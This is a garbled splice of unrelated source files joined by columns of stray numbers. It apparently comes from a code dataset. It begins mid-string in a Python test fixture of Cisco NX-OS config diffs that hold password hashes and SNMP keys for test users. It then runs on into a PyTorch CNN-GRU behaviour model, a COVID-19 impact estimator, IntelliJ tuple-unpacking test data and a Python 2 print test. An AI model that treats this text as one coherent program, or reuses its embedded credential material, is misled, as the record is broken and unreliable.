Ethernet1/13\n\ninterface Ethernet1/14\n\ninterface Ethernet1/15\n\ninterface Ethernet1/16\n\ninterface Ethernet1/17\n\ninterface Ethernet1/18\n\ninterface Ethernet1/19\n\ninterface Ethernet1/20\n\ninterface Ethernet1/21\n\ninterface Ethernet1/22\n\ninterface Ethernet1/23\n\ninterface Ethernet1/24\n\ninterface Ethernet1/25\n\ninterface Ethernet1/26\n\ninterface Ethernet1/27\n\ninterface Ethernet1/28\n\ninterface Ethernet1/29\n\ninterface Ethernet1/30\n\ninterface Ethernet1/31\n\ninterface Ethernet1/32\n\ninterface Ethernet1/33\n\ninterface Ethernet1/34\n\ninterface Ethernet1/35\n\ninterface Ethernet1/36\n\ninterface Ethernet1/37\n\ninterface Ethernet1/38\n\ninterface Ethernet1/39\n\ninterface Ethernet1/40\n\ninterface Ethernet1/41\n\ninterface Ethernet1/42\n\ninterface Ethernet1/43\n\ninterface Ethernet1/44\n\ninterface Ethernet1/45\n\ninterface Ethernet1/46\n\ninterface Ethernet1/47\n\ninterface Ethernet1/48\n\ninterface Ethernet2/1\n\ninterface Ethernet2/2\n\ninterface Ethernet2/3\n\ninterface Ethernet2/4\n\ninterface Ethernet2/5\n\ninterface Ethernet2/6\n\ninterface Ethernet2/7\n\ninterface Ethernet2/8\n\ninterface Ethernet2/9\n\ninterface Ethernet2/10\n\ninterface Ethernet2/11\n\ninterface Ethernet2/12\n\ninterface mgmt0\n vrf member management\n ip address 10.122.197.192/24\n\ninterface loopback0\n\ninterface loopback1\ncli alias name wr copy running startup-config\nline console\nline vty\nboot nxos bootflash:/nxos.9.2.4.bin \nrouter bgp 55\n address-family ipv4 unicast\n no client-to-client reflection\n additional-paths send\n\nno logging logfile\nno logging monitor\nno logging module\nno logging console\n\n\n" ] delete_config = """ COMMAND_LIST: no feature bgp --- +++ @@ -19,7 +19,6 @@ feature bash-shell cfs eth distribute feature ngmvpn -feature bgp feature pim feature lldp @@ -234,10 +233,6 @@ line console line vty boot nxos bootflash:/nxos.9.2.4.bin -router bgp 55 - address-family ipv4 unicast - no client-to-client reflection - additional-paths send no logging logfile no logging monitor """ remove_user = """ COMMAND_LIST: no username salt_test --- +++ @@ -25,8 +25,6 @@ username admin password 5 $5$mOJsBDrL$lhsuyA8VT/fkWM/5XaZcgHlJIYaaS/J5fh8qdDr6fU3 role network-admin username devops_user password 5 ! role network-operator username devops_user passphrase lifetime 99999 warntime 14 gracetime 3 -username salt_test password 5 $5$k8DulS4J$GGvG0RPTZdjklgJ4o6X25/AGpEHw1p1Dz8lI0.J77y3 role network-operator -username salt_test passphrase lifetime 99999 warntime 14 gracetime 3 ip domain-lookup ip name-server 1.1.1.1 2.2.2.2 no system default switchport @@ -39,7 +37,6 @@ copp profile strict snmp-server user admin network-admin auth md5 0xbb62c3df89880933539503f7675e8aa8 priv 0xbb62c3df89880933539503f7675e8aa8 localizedkey snmp-server user devops_user network-operator -snmp-server user salt_test network-operator auth md5 0x6a4237693d3e515b67264a7872476132 priv 0x6a4237693d3e515b67264a7872476132 localizedkey rmon event 1 description FATAL(1) owner PMON@FATAL rmon event 2 description CRITICAL(2) owner PMON@CRITICAL rmon event 3 description ERROR(3) owner PMON@ERROR """ save_running_config = """ COMMAND_LIST: copy running-config startup-config [# ] 1% [# ] 2% [## ] 3% [## ] 4% [### ] 5% [### ] 6% [### ] 7% [#### ] 8% [#### ] 9% [##### ] 10% [##### ] 11% [##### ] 12% [###### ] 13% [###### ] 14% [####### ] 15% [####### ] 16% [####### ] 17% [######## ] 18% [######## ] 19% [######### ] 20% [######### ] 21% [######### ] 22% [########## ] 23% [########## ] 24% [########### ] 25% [########### ] 26% [########### ] 27% [############ ] 28% [############ ] 29% [############# ] 30% [############# ] 31% [############# ] 32% [############## ] 33% [############## ] 34% [############### ] 35% [############### ] 36% [############### ] 37% [################ ] 38% [################ ] 39% [################# ] 40% [################# ] 41% [################# ] 42% [################## ] 43% [################## ] 44% [################### ] 45% [################### ] 46% [################### ] 47% [#################### ] 48% [##################### ] 50% [##################### ] 51% [##################### ] 52% [###################### ] 53% [###################### ] 54% [####################### ] 55% [####################### ] 56% [####################### ] 57% [######################## ] 58% [######################## ] 59% [######################### ] 60% [######################### ] 61% [######################### ] 62% [########################## ] 63% [########################## ] 64% [########################### ] 65% [########################### ] 66% [########################### ] 67% [############################ ] 68% [############################ ] 69% [############################# ] 70% [############################# ] 71% [############################# ] 72% [############################## ] 73% [############################## ] 74% [############################### ] 75% [############################### ] 76% [############################### ] 77% [################################ ] 78% [################################ ] 79% [################################# ] 80% [################################# ] 81% [################################# ] 82% [################################## ] 83% [################################## ] 84% [################################### ] 85% [################################### ] 86% [################################### ] 87% [#################################### ] 88% [#################################### ] 89% [##################################### ] 90% [##################################### ] 91% [##################################### ] 92% [###################################### ] 93% [###################################### ] 94% [####################################### ] 95% [####################################### ] 96% [####################################### ] 97% [########################################] 98% [########################################] 100% Copy complete, now saving to disk (please wait)... Copy complete. """ set_role = """ COMMAND_LIST: username salt_test role vdc-admin warning: password for user:salt_test not set. S/he may not be able to login --- +++ @@ -26,6 +26,8 @@ username admin password 5 $5$mOJsBDrL$lhsuyA8VT/fkWM/5XaZcgHlJIYaaS/J5fh8qdDr6fU3 role network-admin username devops_user password 5 ! role network-operator username devops_user passphrase lifetime 99999 warntime 14 gracetime 3 +username salt_test password 5 ! role vdc-admin +username salt_test passphrase lifetime 99999 warntime 14 gracetime 3 ip domain-lookup ip name-server 1.1.1.1 2.2.2.2 no system default switchport @@ -38,6 +40,7 @@ copp profile strict snmp-server user admin network-admin auth md5 0xbb62c3df89880933539503f7675e8aa8 priv 0xbb62c3df89880933539503f7675e8aa8 localizedkey snmp-server user devops_user network-operator +snmp-server user salt_test vdc-admin rmon event 1 description FATAL(1) owner PMON@FATAL rmon event 2 description CRITICAL(2) owner PMON@CRITICAL rmon event 3 description ERROR(3) owner PMON@ERROR """ unset_role = """ COMMAND_LIST: no username salt_test role vdc-admin --- +++ @@ -26,8 +26,7 @@ username admin password 5 $5$mOJsBDrL$lhsuyA8VT/fkWM/5XaZcgHlJIYaaS/J5fh8qdDr6fU3 role network-admin username ansible password 5 ! role network-operator username ansible passphrase lifetime 99999 warntime 14 gracetime 3 -username salt_test password 5 ! role vdc-admin -username salt_test role network-operator +username salt_test password 5 ! role network-operator username salt_test passphrase lifetime 99999 warntime 14 gracetime 3 ip domain-lookup ip name-server 1.1.1.1 2.2.2.2 @@ -41,8 +40,7 @@ copp profile strict snmp-server user admin network-admin auth md5 0xbb62c3df89880933539503f7675e8aa8 priv 0xbb62c3df89880933539503f7675e8aa8 localizedkey snmp-server user ansible network-operator -snmp-server user salt_test vdc-admin -snmp-server user salt_test network-operator +snmp-server user salt_test network-operator rmon event 1 description FATAL(1) owner PMON@FATAL rmon event 2 description CRITICAL(2) owner PMON@CRITICAL rmon event 3 description ERROR(3) owner PMON@ERROR """
134.825397
6,290
0.719626
4,593
33,976
5.286305
0.082081
0.121417
0.158155
0.103295
0.960091
0.958979
0.951647
0.949794
0.947446
0.942504
0
0.07918
0.145426
33,976
251
6,291
135.36255
0.757052
0.000618
0
0.200873
0
0.017467
0.984508
0.371101
0
0
0.024033
0
0
1
0
false
0.091703
0
0
0
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
1
1
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
10
936c12de11bd451bfdff49fd7103d0bddb25ce2d
8,311
py
Python
src/TASK_train_E-BP_Emo2beh_seq_model/TASK_couple_sequence_model _with_pretrained_E-BP/Model_class_sequence_couple_pretrained_CMU.py
haoqi/emotions_as_primitives_towards_behavior_understanding
5d82bb0265e585da1cd0144bb93b28dc5cb0e710
[ "0BSD" ]
2
2020-08-13T18:26:46.000Z
2021-04-07T18:58:48.000Z
src/TASK_train_E-BP_Emo2beh_seq_model/TASK_couple_sequence_model _with_pretrained_E-BP/Model_class_sequence_couple_pretrained_CMU.py
haoqi/emotions_as_primitives_towards_behavior_understanding
5d82bb0265e585da1cd0144bb93b28dc5cb0e710
[ "0BSD" ]
null
null
null
src/TASK_train_E-BP_Emo2beh_seq_model/TASK_couple_sequence_model _with_pretrained_E-BP/Model_class_sequence_couple_pretrained_CMU.py
haoqi/emotions_as_primitives_towards_behavior_understanding
5d82bb0265e585da1cd0144bb93b28dc5cb0e710
[ "0BSD" ]
null
null
null
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Thu Jan 10 16:00:42 2019 @author: haoqi """ import torch import torch.nn as nn import pdb device = torch.device("cuda" if torch.cuda.is_available() else "cpu") # the model is based on CMU emotion # Base_1D_NN_fixed_seq_len_1s_majvote_v2 #--------------------------------------------------------------------------------------------------- # GRU seq models #--------------------------------------------------------------------------------------------------- class model_cnn_seq_CMU_pretrained_N1(nn.Module): def __init__(self, in_channels_num): super(model_cnn_seq_CMU_pretrained_N1, self).__init__() self.cnn_1d=nn.Sequential( nn.Conv1d(in_channels_num, 96, kernel_size=10, stride=2, padding=0), # input_len=1*100, out 46 nn.ReLU() ) self.cnn_1d_part2=nn.Sequential( nn.Conv1d(96, 96, kernel_size=5, stride=2, padding=0), # in 46, out 21 nn.ReLU(), nn.Conv1d(96, 96, kernel_size=5, stride=2, padding=0), # in 21, out 9 nn.ReLU(), nn.Conv1d(96, 128, kernel_size=3, stride=2, padding=0),# in 9, out 4 nn.ReLU(), nn.AdaptiveMaxPool1d(1) ) self.num_of_behs = 5 self.hidden_sz = 128 self.num_layers = 2 self.gru1 = nn.GRU(input_size=128, hidden_size=self.hidden_sz, num_layers=self.num_layers) self.fc_out = nn.Sequential( nn.Linear(self.hidden_sz, int(self.hidden_sz/2)), nn.ReLU(), nn.Linear(int(self.hidden_sz/2), self.num_of_behs) ) def forward(self, x_input): x_cnn_output1 = self.cnn_1d(x_input) x_cnn_output2 = self.cnn_1d_part2(x_cnn_output1) x = x_cnn_output2.view(x_cnn_output2.size(0), -1) # the shape of output from CNN is (Num_seq, channels=128) x_input_to_seq = torch.unsqueeze(x, 1) # change to the input of seq model (seq_len, batch, input_size): batch_sz = x_input_to_seq.shape[1] h_init = self.initHidden(batch_sz) x, hidden = self.gru1(x_input_to_seq , h_init) x_ouput = self.fc_out(x[-1,:,:]) # only return last time step's results, this is a many-to-one sequence problem return x_ouput def initHidden(self, batch_sz): return torch.zeros(self.num_layers, batch_sz, self.hidden_sz, device=device) class model_cnn_seq_CMU_pretrained_N2(nn.Module): def __init__(self, in_channels_num): super(model_cnn_seq_CMU_pretrained_N2, self).__init__() self.cnn_1d=nn.Sequential( nn.Conv1d(in_channels_num, 96, kernel_size=10, stride=2, padding=0), # input_len=1*100, out 46 nn.ReLU(), nn.Conv1d(96, 96, kernel_size=5, stride=2, padding=0), # in 46, out 21 nn.ReLU(), nn.Conv1d(96, 96, kernel_size=5, stride=2, padding=0), # in 21, out 9 nn.ReLU() ) self.cnn_1d_part2=nn.Sequential( nn.Conv1d(96, 128, kernel_size=3, stride=2, padding=0),# in 9, out 4 nn.ReLU(), nn.AdaptiveMaxPool1d(1) ) self.num_of_behs = 5 self.hidden_sz = 128 self.num_layers = 2 self.gru1 = nn.GRU(input_size=128, hidden_size=self.hidden_sz, num_layers=self.num_layers) self.fc_out = nn.Sequential( nn.Linear(self.hidden_sz, int(self.hidden_sz/2)), nn.ReLU(), nn.Linear(int(self.hidden_sz/2), self.num_of_behs) ) def forward(self, x_input): x_cnn_output1 = self.cnn_1d(x_input) x_cnn_output2 = self.cnn_1d_part2(x_cnn_output1) x = x_cnn_output2.view(x_cnn_output2.size(0), -1) # the shape of output from CNN is (Num_seq, channels=128) x_input_to_seq = torch.unsqueeze(x, 1) # change to the input of seq model (seq_len, batch, input_size): batch_sz = x_input_to_seq.shape[1] h_init = self.initHidden(batch_sz) x, hidden = self.gru1(x_input_to_seq , h_init) x_ouput = self.fc_out(x[-1,:,:]) # only return last time step's results, this is a many-to-one sequence problem return x_ouput def initHidden(self, batch_sz): return torch.zeros(self.num_layers, batch_sz, self.hidden_sz, device=device) class model_cnn_seq_CMU_pretrained_N3(nn.Module): def __init__(self, in_channels_num): super(model_cnn_seq_CMU_pretrained_N3, self).__init__() self.cnn_1d=nn.Sequential( nn.Conv1d(in_channels_num, 96, kernel_size=10, stride=2, padding=0), # input_len=1*100, out 46 nn.ReLU(), nn.Conv1d(96, 96, kernel_size=5, stride=2, padding=0), # in 46, out 21 nn.ReLU() ) self.cnn_1d_part2=nn.Sequential( nn.Conv1d(96, 96, kernel_size=5, stride=2, padding=0), # in 21, out 9 nn.ReLU(), nn.Conv1d(96, 128, kernel_size=3, stride=2, padding=0),# in 9, out 4 nn.ReLU(), nn.AdaptiveMaxPool1d(1) ) self.num_of_behs = 5 self.hidden_sz = 128 self.num_layers = 2 self.gru1 = nn.GRU(input_size=128, hidden_size=self.hidden_sz, num_layers=self.num_layers) self.fc_out = nn.Sequential( nn.Linear(self.hidden_sz, int(self.hidden_sz/2)), nn.ReLU(), nn.Linear(int(self.hidden_sz/2), self.num_of_behs) ) def forward(self, x_input): x_cnn_output1 = self.cnn_1d(x_input) x_cnn_output2 = self.cnn_1d_part2(x_cnn_output1) x = x_cnn_output2.view(x_cnn_output2.size(0), -1) # the shape of output from CNN is (Num_seq, channels=128) x_input_to_seq = torch.unsqueeze(x, 1) # change to the input of seq model (seq_len, batch, input_size): batch_sz = x_input_to_seq.shape[1] h_init = self.initHidden(batch_sz) x, hidden = self.gru1(x_input_to_seq , h_init) x_ouput = self.fc_out(x[-1,:,:]) # only return last time step's results, this is a many-to-one sequence problem return x_ouput def initHidden(self, batch_sz): return torch.zeros(self.num_layers, batch_sz, self.hidden_sz, device=device) class model_cnn_seq_CMU_pretrained_N4(nn.Module): def __init__(self, in_channels_num): super(model_cnn_seq_CMU_pretrained_N4, self).__init__() self.cnn_1d=nn.Sequential( nn.Conv1d(in_channels_num, 96, kernel_size=10, stride=2, padding=0), # input_len=1*100, out 46 nn.ReLU(), nn.Conv1d(96, 96, kernel_size=5, stride=2, padding=0), # in 46, out 21 nn.ReLU(), nn.Conv1d(96, 96, kernel_size=5, stride=2, padding=0), # in 21, out 9 nn.ReLU(), nn.Conv1d(96, 128, kernel_size=3, stride=2, padding=0),# in 9, out 4 nn.ReLU(), nn.AdaptiveMaxPool1d(1) ) self.num_of_behs = 5 self.hidden_sz = 128 self.num_layers = 2 self.gru1 = nn.GRU(input_size=128, hidden_size=self.hidden_sz, num_layers=self.num_layers) self.fc_out = nn.Sequential( nn.Linear(self.hidden_sz, int(self.hidden_sz/2)), nn.ReLU(), nn.Linear(int(self.hidden_sz/2), self.num_of_behs) ) def forward(self, x_input): x_cnn_output1 = self.cnn_1d(x_input) x = x_cnn_output1.view(x_cnn_output1.size(0), -1) # the shape of output from CNN is (Num_seq, channels=128) x_input_to_seq = torch.unsqueeze(x, 1) # change to the input of seq model (seq_len, batch, input_size): batch_sz = x_input_to_seq.shape[1] h_init = self.initHidden(batch_sz) x, hidden = self.gru1(x_input_to_seq , h_init) x_ouput = self.fc_out(x[-1,:,:]) # only return last time step's results, this is a many-to-one sequence problem return x_ouput def initHidden(self, batch_sz): return torch.zeros(self.num_layers, batch_sz, self.hidden_sz, device=device)
40.541463
119
0.586572
1,241
8,311
3.659952
0.097502
0.05284
0.063408
0.05284
0.945839
0.945839
0.935931
0.935931
0.935931
0.935931
0
0.056547
0.278667
8,311
204
120
40.740196
0.701084
0.172422
0
0.838926
0
0
0.001024
0
0
0
0
0
0
1
0.080537
false
0
0.020134
0.026846
0.181208
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
fab758dc8f7ee10af088488b1baa483e1f8234ed
5,441
py
Python
src/djangoEstimator/periodtype.py
ronjones340/andelas
8d5212f211eb9735db3d154fff942f0fccdb6d48
[ "MIT" ]
null
null
null
src/djangoEstimator/periodtype.py
ronjones340/andelas
8d5212f211eb9735db3d154fff942f0fccdb6d48
[ "MIT" ]
1
2021-05-11T10:32:40.000Z
2021-05-11T10:32:40.000Z
src/djangoEstimator/periodtype.py
ronjones340/andelas
8d5212f211eb9735db3d154fff942f0fccdb6d48
[ "MIT" ]
null
null
null
from math import trunc def days(data): impact = {} severeImpact = {} impact['currentlyInfected'] = data['reportedCases'] * 10 severeImpact['currentlyInfected'] = data['reportedCases'] * 50 impact['infectionsByRequestedTime'] = impact['currentlyInfected'] * pow(2, trunc(data['timeToElapse'] / 3)) severeImpact['infectionsByRequestedTime'] = severeImpact['currentlyInfected'] * pow(2, trunc(data['timeToElapse'] / 3)) impact['severeCasesByRequestedTime'] = trunc(impact['infectionsByRequestedTime'] * 0.15) severeImpact['severeCasesByRequestedTime'] = trunc(severeImpact['infectionsByRequestedTime'] * 0.15) availablebeds = trunc(data['totalHospitalBeds'] * 0.35) impact['hospitalBedsByRequestedTime'] = availablebeds - impact['severeCasesByRequestedTime']+1 severeImpact['hospitalBedsByRequestedTime'] = availablebeds - severeImpact['severeCasesByRequestedTime']+1 impact['casesForICUByRequestedTime'] = trunc(impact['infectionsByRequestedTime'] * 0.05) severeImpact['casesForICUByRequestedTime'] = trunc(severeImpact['infectionsByRequestedTime'] * 0.05) impact['casesForVentilatorsByRequestedTime'] = trunc(impact['infectionsByRequestedTime'] * 0.02) severeImpact['casesForVentilatorsByRequestedTime'] = trunc(severeImpact['infectionsByRequestedTime'] * 0.02) impact['dollarsInFlight'] = trunc((impact["infectionsByRequestedTime"] * data['region']['avgDailyIncomePopulation'] * data['region']['avgDailyIncomeInUSD'])*data['timeToElapse']) severeImpact['dollarsInFlight'] = trunc((severeImpact["infectionsByRequestedTime"] * data['region']['avgDailyIncomePopulation'] * data['region']['avgDailyIncomeInUSD'])*data['timeToElapse']) result = { 'data': data, 'impact': impact, 'severeImpact':severeImpact } return result def weeks(data): impact = {} severeImpact = {} impact['currentlyInfected'] = data['reportedCases'] * 10 severeImpact['currentlyInfected'] = data['reportedCases'] * 50 impact['infectionsByRequestedTime'] = impact['currentlyInfected'] * pow(2, trunc(data['timeToElapse'] *7 / 3)) severeImpact['infectionsByRequestedTime'] = severeImpact['currentlyInfected'] * pow(2, trunc(data['timeToElapse']*7/ 3)) impact['severeCasesByRequestedTime'] = trunc(impact['infectionsByRequestedTime'] * 0.15) severeImpact['severeCasesByRequestedTime'] = trunc(severeImpact['infectionsByRequestedTime'] * 0.15) availablebeds = trunc(data['totalHospitalBeds'] * 0.35) impact['hospitalBedsByRequestedTime'] = availablebeds - impact['severeCasesByRequestedTime']+1 severeImpact['hospitalBedsByRequestedTime'] = availablebeds - severeImpact['severeCasesByRequestedTime']+1 impact['casesForICUByRequestedTime'] = trunc(impact['infectionsByRequestedTime'] * 0.05) severeImpact['casesForICUByRequestedTime'] = trunc(severeImpact['infectionsByRequestedTime'] * 0.05) impact['casesForVentilatorsByRequestedTime'] = trunc(impact['infectionsByRequestedTime'] * 0.02) severeImpact['casesForVentilatorsByRequestedTime'] = trunc(severeImpact['infectionsByRequestedTime'] * 0.02) impact['dollarsInFlight'] = trunc((impact["infectionsByRequestedTime"] * data['region']['avgDailyIncomePopulation'] * data['region']['avgDailyIncomeInUSD'])*data['timeToElapse']) severeImpact['dollarsInFlight'] = trunc((severeImpact["infectionsByRequestedTime"] * data['region']['avgDailyIncomePopulation'] * data['region']['avgDailyIncomeInUSD'])*data['timeToElapse']) result = { 'data': data, 'impact': impact, 'severeImpact':severeImpact } return result def months(data): impact = {} severeImpact = {} impact['currentlyInfected'] = data['reportedCases'] * 10 severeImpact['currentlyInfected'] = data['reportedCases'] * 50 impact['infectionsByRequestedTime'] = impact['currentlyInfected'] * pow(2, trunc(data['timeToElapse']*30/ 3)) severeImpact['infectionsByRequestedTime'] = severeImpact['currentlyInfected'] * pow(2, trunc(data['timeToElapse']*30/ 3)) impact['severeCasesByRequestedTime'] = trunc(impact['infectionsByRequestedTime'] * 0.15) severeImpact['severeCasesByRequestedTime'] = trunc(severeImpact['infectionsByRequestedTime'] * 0.15) availablebeds = trunc(data['totalHospitalBeds'] * 0.35) impact['hospitalBedsByRequestedTime'] = availablebeds - impact['severeCasesByRequestedTime']+1 severeImpact['hospitalBedsByRequestedTime'] = availablebeds - severeImpact['severeCasesByRequestedTime'] + 1 impact['casesForICUByRequestedTime'] = trunc(impact['infectionsByRequestedTime'] * 0.05) severeImpact['casesForICUByRequestedTime'] = trunc(severeImpact['infectionsByRequestedTime'] * 0.05) impact['casesForVentilatorsByRequestedTime'] = trunc(impact['infectionsByRequestedTime'] * 0.02) severeImpact['casesForVentilatorsByRequestedTime'] = trunc(severeImpact['infectionsByRequestedTime'] * 0.02) impact['dollarsInFlight'] = trunc((impact["infectionsByRequestedTime"] * data['region']['avgDailyIncomePopulation'] * data['region']['avgDailyIncomeInUSD'])*data['timeToElapse']) severeImpact['dollarsInFlight'] = trunc((severeImpact["infectionsByRequestedTime"] * data['region']['avgDailyIncomePopulation'] * data['region']['avgDailyIncomeInUSD'])*data['timeToElapse']) result = { 'data': data, 'impact': impact, 'severeImpact':severeImpact } return result
70.662338
194
0.736813
398
5,441
10.072864
0.100503
0.116737
0.107758
0.083063
0.990771
0.990771
0.990771
0.990771
0.989274
0.989274
0
0.020604
0.11689
5,441
77
195
70.662338
0.813736
0
0
0.821918
0
0
0.468026
0.31753
0
0
0
0
0
1
0.041096
false
0
0.013699
0
0.09589
0
0
0
1
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
faceb4a7e5182ecb91fa809d8a2314d489b407c1
282
py
Python
python/testData/inspections/PyTupleAssignmentBalanceInspection/py4358.py
truthiswill/intellij-community
fff88cfb0dc168eea18ecb745d3e5b93f57b0b95
[ "Apache-2.0" ]
2
2019-04-28T07:48:50.000Z
2020-12-11T14:18:08.000Z
python/testData/inspections/PyTupleAssignmentBalanceInspection/py4358.py
truthiswill/intellij-community
fff88cfb0dc168eea18ecb745d3e5b93f57b0b95
[ "Apache-2.0" ]
173
2018-07-05T13:59:39.000Z
2018-08-09T01:12:03.000Z
python/testData/inspections/PyTupleAssignmentBalanceInspection/py4358.py
truthiswill/intellij-community
fff88cfb0dc168eea18ecb745d3e5b93f57b0b95
[ "Apache-2.0" ]
2
2020-03-15T08:57:37.000Z
2020-04-07T04:48:14.000Z
a, b = <warning descr="Too many values to unpack">[1, 2, 3]</warning> a, b = <warning descr="Too many values to unpack">'str'</warning> a, b = <warning descr="Too many values to unpack">{1, 2, 3}</warning> a, b = <warning descr="Too many values to unpack">{1:2, 2: 3, 3:4}</warning>
70.5
76
0.648936
53
282
3.45283
0.264151
0.043716
0.196721
0.306011
0.923497
0.923497
0.923497
0.923497
0.923497
0.923497
0
0.05
0.148936
282
4
76
70.5
0.7125
0
0
0
0
0
0.363958
0
0
0
0
0
0
0
null
null
0
0
null
null
0
0
0
0
null
0
1
1
1
1
1
1
1
1
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
10
faf68a4c49d6ca83f7a9567e415a06f7e8620d4c
185
py
Python
rasengan/test_print.py
se4u/rasengan
9b327b207559b829fcb870f80e6e0df7c6394ca5
[ "MIT" ]
1
2017-12-07T20:12:21.000Z
2017-12-07T20:12:21.000Z
rasengan/test_print.py
se4u/rasengan
9b327b207559b829fcb870f80e6e0df7c6394ca5
[ "MIT" ]
null
null
null
rasengan/test_print.py
se4u/rasengan
9b327b207559b829fcb870f80e6e0df7c6394ca5
[ "MIT" ]
null
null
null
import rasengan rasengan.setup_print_indent() rasengan.increase_print_indent() print 1 print '1' rasengan.increase_print_indent() print '2' rasengan.decrease_print_indent() print '123'
18.5
32
0.827027
26
185
5.576923
0.384615
0.303448
0.331034
0.372414
0.441379
0
0
0
0
0
0
0.035088
0.075676
185
9
33
20.555556
0.812866
0
0
0.222222
0
0
0.027027
0
0
0
0
0
0
0
null
null
0
0.111111
null
null
0.888889
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
1
0
7